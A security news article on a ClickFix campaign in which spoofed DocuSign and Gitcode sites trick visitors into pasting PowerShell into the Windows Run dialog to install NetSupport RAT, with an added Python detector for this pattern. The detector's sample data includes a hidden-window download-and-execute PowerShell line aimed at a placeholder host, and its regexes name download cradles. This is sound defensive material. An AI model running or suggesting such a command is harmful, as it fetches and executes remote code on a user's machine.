- Threat actors create fake DocuSign and Gitcode websites
- The sites come with a fake CAPTCHA and other scam mechanisms
- Victims are tricked into downloading a Trojan
Security researchers have found fake Gitcode and DocuSign websites distributing a remote access trojan (RAT) using the infamous ClickFix method.
Experts from DomainTools Investigations (DTI) found “multiple malware-downloader PowerShell scripts” hosted on spoofed websites that invite visitors to open the Windows Run dialog and execute a script copied to their clipboard.
“Doing so downloads another downloader script and runs it on the system, which in turn retrieves additional payloads and finally executes them to install NetSupport RAT on infected machines,” the researchers said in their report. These multiple stages and downloads are designed to evade detection and help the campaign “be more resilient to security investigations and takedowns”.
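As an added example (not code from the DTI report or this article), the following Python detector scores process-creation events for the pattern described above: an interpreter launched from the Run dialog (parent explorer.exe) with a hidden window and a download-and-execute command line. The event records and the URL in them are constructed for the demo.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 or an EDR equivalent)."""
    parent_image: str
    image: str
    command_line: str

# The Run dialog launches children from explorer.exe; these are the interpreters ClickFix lures abuse.
RUN_DIALOG_PARENT = "explorer.exe"
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Each indicator is (label, case-insensitive regex over the command line).
INDICATORS = [
    ("hidden window", re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I)),
    ("download cradle", re.compile(r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient|\bcurl\b", re.I)),
    ("in-memory execution", re.compile(r"invoke-expression|\biex\b|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("bypassed policy", re.compile(r"-e(xecution)?p(olicy)?\s+bypass|-nop\b", re.I)),
]

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(ev: ProcEvent) -> list[str]:
    """Return the indicator labels matched; an empty list means not suspicious."""
    if basename(ev.parent_image) != RUN_DIALOG_PARENT or basename(ev.image) not in INTERPRETERS:
        return []
    hits = [label for label, rx in INDICATORS if rx.search(ev.command_line)]
    # A hidden window alone is noisy; require a retrieval or in-memory execution indicator too.
    return hits if any(h in ("download cradle", "in-memory execution") for h in hits) else []

def flag_clickfix(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Return (event, reasons) for every event matching the Run-dialog ClickFix pattern."""
    return [(ev, hits) for ev in events if (hits := score_event(ev))]

# Constructed sample events; not taken from the DTI report. The host name is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -ep bypass -c "iex (iwr http://placeholder.invalid/s1.ps1 -UseBasicParsing)"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe C:\\Users\\u\\notes.txt"),
    ProcEvent(r"C:\Program Files\Vendor\agent.exe", PS, "powershell -ep bypass -file C:\\ProgramData\\Vendor\\inv.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell Get-ChildItem C:\\Temp"),
]

if __name__ == "__main__":
    for ev, hits in flag_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {basename(ev.image)} <- {basename(ev.parent_image)}: {', '.join(hits)}")
```

Only the first sample fires: the scripted agent run has a non-explorer parent, and the interactive Get-ChildItem has no download or execution indicator.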
SocGholish
They also said they do not know exactly how victims end up on these websites, but it is safe to assume that social engineering, email spam and possibly malvertising are part of the methodology. In some cases the fake websites also come with a fake CAPTCHA verification mechanism which, to be solved, requires victims to copy and paste a command into the Run dialog, effectively downloading the malware.
DTI could not confirm the identity of the attackers, but stressed that it had observed a similar campaign at the end of 2024, which was attributed to SocGholish:
“In particular, the techniques involved are commonplace, and NetSupport Manager is a legitimate administration tool known to be abused as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, Storm-0408 and others,” the report concludes.
SocGholish, also known as FakeUpdates, is known for its fake browser and fake software update alerts. After compromising a website, the crooks inject a pop-up window informing visitors that their browser or operating system needs to be “fixed” or “updated”.
This is the “original” ClickFix method, which evolved from the old “you have a virus” pop-up that imitated popular antivirus programs and delivered viruses instead.
Via The Hacker News